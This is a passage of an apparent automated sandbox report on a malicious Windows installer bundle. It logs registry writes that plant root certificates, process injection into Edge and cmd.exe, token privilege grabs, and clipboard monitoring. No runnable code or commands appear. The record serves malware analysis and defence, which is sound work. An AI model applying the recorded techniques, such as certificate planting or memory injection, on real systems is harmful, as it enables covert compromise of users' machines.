d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe N/A

Runs net.exe

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19c6762a08beae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19c6762a08beae.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A c:\windows\system32\svchost.exe N/A
N/A N/A c:\windows\system32\svchost.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19c6762a08beae.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\cheugba N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\cheugba N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\cheugba N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

Suspicious behavior: SetClipboardViewer

Description Indicator Process Target
N/A N/A C:\ProgramData\6848594.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19f84b58b3d7.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat191649b47c9e2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\820992.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\889030.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WerFault.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\ProgramData\5295645.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4956 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 4956 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 4956 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 5004 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe
PID 5004 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe
PID 5004 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe
PID 5108 wrote to memory of 3376 N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5108 wrote to memory of 3376 N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5108 wrote to memory of 3376 N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5108 wrote to memory of 3400 N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5108 wrote to memory of 3400 N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5108 wrote to memory of 3400 N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5108 wrote to memory of 3568 N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5108 wrote to memory of 3568 N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5108 wrote to memory of 3568 N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5108 wrote to memory of 3472 N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5108 wrote to memory of 3472 N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5108 wrote to memory of 3472 N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5108 wrote to memory of 3596 N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5108 wrote to memory of 3596 N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5108 wrote to memory of 3596 N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5108 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5108 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5108 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5108 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5108 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5108 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3472 wrote to memory of 4408 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat1946eb84e6.exe
PID 3472 wrote to memory of 4408 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat1946eb84e6.exe
PID 3472 wrote to memory of 4408 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat1946eb84e6.exe
PID 5108 wrote to memory of 4428 N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5108 wrote to memory of 4428 N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5108 wrote to memory of 4428 N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3468 wrote to memory of 3032 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19e4750dd01.exe
PID 3468 wrote to memory of 3032 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19e4750dd01.exe
PID 3468 wrote to memory of 3032 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19e4750dd01.exe
PID 5108 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5108 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5108 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3400 wrote to memory of 4128 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe
PID 3400 wrote to memory of 4128 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe
